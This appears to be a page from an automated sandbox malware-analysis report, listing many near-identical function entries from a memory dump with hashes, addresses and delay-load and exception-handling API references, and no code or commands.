API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: fc35a6f8ea0852b9164bfe772dbc4f8ea8f5e2eda06dd5dc5c0db056709c1c0a
Instruction ID: 8c2205cc2dd485ca16331fbcd03ffa0db6eaad162a3a23fcfee3f08bf386eb74
Opcode Fuzzy Hash: fc35a6f8ea0852b9164bfe772dbc4f8ea8f5e2eda06dd5dc5c0db056709c1c0a
Instruction Fuzzy Hash: 6FB012E63DC104BC3514610B1C02D37421DD0C0F30330493EF906C0091D8406D400631

Function 009FE232 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 453bdcccd30b266abf2b6fcc6ba3595c6d8f9f84e567eb6cd068822b0c803900
Instruction ID: f2e47ba3df183021fa2a29636f5fec16d1c097d7beb19565c84074eae6a17254
Opcode Fuzzy Hash: 453bdcccd30b266abf2b6fcc6ba3595c6d8f9f84e567eb6cd068822b0c803900
Instruction Fuzzy Hash: 4AB012E63DC104BC3514610A1D02D37421DC0C0F30330493EF906C0090DC406E410631

Function 009FE228 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d4302b365a1a2188733900ff9fffc18c93d0f5daa9b51ee78243752bbaa0cdb0
Instruction ID: 4ff5ae4ee82a4a5b34f9d56050dd94ca50daa379eb7ad6355f9de3bc83ac02af
Opcode Fuzzy Hash: d4302b365a1a2188733900ff9fffc18c93d0f5daa9b51ee78243752bbaa0cdb0
Instruction Fuzzy Hash: D8B012E63DC204BC3554610A1C02D37021DC0C0F303304A3EF906C0090D8406D800631

Function 009FE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ef9a7b656242c8ae5c7f533f6487c002a676cb5acca025de301b68f982286d23
Instruction ID: 06ff787bc98a6c2bf02692e8a79955287187026569e717e2ac843f8432c69e9f
Opcode Fuzzy Hash: ef9a7b656242c8ae5c7f533f6487c002a676cb5acca025de301b68f982286d23
Instruction Fuzzy Hash: 6BB012E63DD244BC3554620A1C02D37021EC1C0B303304A3EF906C0090D8406C840631

Function 009FE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 605b604e502219b0e65bd28154c27cf705cfcc5730c5987d3998583a368b199c
Instruction ID: 51a31d2dbd109deec22958d3e8eebff070d05ac718e2ada3e5f2d4d0555aa3af
Opcode Fuzzy Hash: 605b604e502219b0e65bd28154c27cf705cfcc5730c5987d3998583a368b199c
Instruction Fuzzy Hash: 4EB012D63DD184BC3514610A1C02D37021EC1C1B30330893EFD06C0090D840AC400631

Function 009FE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 23ebe9dec483a14a85902dfc0a666b92680194f158f34e2a54baebe930f32f8e
Instruction ID: dfe675ff20120cd2b5c62568a654ddae9e6c3ada1030723c61c9c9b6205bc3f0
Opcode Fuzzy Hash: 23ebe9dec483a14a85902dfc0a666b92680194f158f34e2a54baebe930f32f8e
Instruction Fuzzy Hash: 46B012DA3DC144BC3514611A1C02D37025DC0C1B30330C93EFE06C0090D940AC400631

Function 009FE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 86e863d7502a9dbe7d3c81bcaac993e7b29d94b7b53b10cedc14bcbc2ec4ff53
Instruction ID: ad86746e5369efa71aed3d4a724c516f5e85a16628e5a75049a85a409f58828e
Opcode Fuzzy Hash: 86e863d7502a9dbe7d3c81bcaac993e7b29d94b7b53b10cedc14bcbc2ec4ff53
Instruction Fuzzy Hash: 83B012D63ED144BC3514610A1C02D37025ED5C0B30330493EF907C0090D8406C400631

Function 009FE419 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE3FC

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: e363d5d20ed46808b305d35e69eb8c92b03cc789d44c3d2564ff4f95187d91f1
Instruction ID: aba654f22374291f420542914a0d3274ac7cb6f293a97817a5fbdff69389b5cf
Opcode Fuzzy Hash: e363d5d20ed46808b305d35e69eb8c92b03cc789d44c3d2564ff4f95187d91f1
Instruction Fuzzy Hash: B5B012EA2A92547C3208A1041D06D77022CC0C0B30330D92EF715C1090D8800C490633

Function 009FE423 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE3FC

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2e52010bc892cb87cb7aff404e25796d1c64792e4269f2cb38e7ef54b7c88771
Instruction ID: e4ca0fea299631093241d68eebe6f4e371d287dbec8186ca4c207f7d1e8607d4
Opcode Fuzzy Hash: 2e52010bc892cb87cb7aff404e25796d1c64792e4269f2cb38e7ef54b7c88771
Instruction Fuzzy Hash: CFB012FA2A8244BC3108A1041C06D37021CC0C0F303309A2EF915C1090D8844E400633

Function 009FE44B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE3FC

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 317fb3f9fca4a749d7d5df9d60d60a45a15525d910957561daf67f42cd2fa02f
Instruction ID: 5fbb970adf4baac81f071adf5c32483d7fa3f82eb8a65640a269a93fa36fb0dd
Opcode Fuzzy Hash: 317fb3f9fca4a749d7d5df9d60d60a45a15525d910957561daf67f42cd2fa02f
Instruction Fuzzy Hash: 9AB012EA2A9244BC3108E1041C06D37026CC0C0B30330D92EFA15C1090D8804C440633

Function 009FE593 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE580

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 16f3bad795c25c89a704c52238675778f745316d58bd4625bed77aeb48ee103e
Instruction ID: d958531d6c5fa53b57a46dafa1dc6b3a452fdb128af1d9d5810c45843c8789ef
Opcode Fuzzy Hash: 16f3bad795c25c89a704c52238675778f745316d58bd4625bed77aeb48ee103e
Instruction Fuzzy Hash: D0B012C629821C7D390861581C02D37011CD0C0B30330592EF525C5090E8800D400635

Function 009FE5B1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE580

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2326f08524e795035309e2cf1d4082c24cde12f5990bd9c4dcafa7c4271bcd3e
Instruction ID: aebbd83bfe837cc9f6860b4ed64610c03cb076418dc8811096c88121ebd5d4c9
Opcode Fuzzy Hash: 2326f08524e795035309e2cf1d4082c24cde12f5990bd9c4dcafa7c4271bcd3e
Instruction Fuzzy Hash: A3B012C62983187C394461585C03D37012CC0C0B303305B2EF525C5090E9400D800635

Function 009FE5A7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE580

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: cceaa6ec1644d4046359860162233a0e2063d3a161da68ece58ab98b532b5cd7
Instruction ID: 7554a39bd96d81d6787d87d4b99ba728808e7bf9110034298b55c3391e5b6c17
Opcode Fuzzy Hash: cceaa6ec1644d4046359860162233a0e2063d3a161da68ece58ab98b532b5cd7
Instruction Fuzzy Hash: 6EB012C62982187C390461585D02D37012CC0C0B303305B2EF525C5090ED400E410635

Function 009FE50D Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE51F

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 100c6f4804f48e1785e282d4730d9687ee29a8e550ff67f510014adc63556b3e
Instruction ID: 73b2e3cb8e16e726cfd6f21d4641566f8003df7eb2aef935cfe41dcca4c11133
Opcode Fuzzy Hash: 100c6f4804f48e1785e282d4730d9687ee29a8e550ff67f510014adc63556b3e
Instruction Fuzzy Hash: 76B012C66991047C350421241C06D3B011CD4C1F30330593EF522C0492E8440D440531

Function 009FE532 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE51F

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6d1f1d9e659b6cc93643e466a17efe35f32bea37b9817f75c3e94016e7cda337
Instruction ID: 4d16b42848be478a6af500325108de3e95cd4ba58469a3a39765b88c993de4e6
Opcode Fuzzy Hash: 6d1f1d9e659b6cc93643e466a17efe35f32bea37b9817f75c3e94016e7cda337
Instruction Fuzzy Hash: D0B012C66991047D350861081C02E3B011CD0C1F30330592EF515C0491E8840C400631

Function 009FE528 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE51F

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c9dd56c637d01673da133564e81d43e084908e412c2a6a2aa0b78ab1159638d4
Instruction ID: dea5cb8db46e553d606531c51b5f1d8d5c3c73a0d03d63da877df50096316a27
Opcode Fuzzy Hash: c9dd56c637d01673da133564e81d43e084908e412c2a6a2aa0b78ab1159638d4
Instruction Fuzzy Hash: A4B012C66991447C360861081D02D3B051CC0C1F30330992EF615C0491E8840C410631

Function 009FE546 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE51F

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8b5ae333ac47184d926d292c7ba8b89a753a9d05b1ebb8b3d568f0a1250b2021
Instruction ID: d3d975fd3a04b8e01fa9534ea346e7e5f19c53a73ad699c7d6be2de43d88ee46
Opcode Fuzzy Hash: 8b5ae333ac47184d926d292c7ba8b89a753a9d05b1ebb8b3d568f0a1250b2021
Instruction Fuzzy Hash: BBB012C66992047C360461085C03D3B011CC0C1F313305B2EF515C0091E8440C840631

Function 009FE29B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
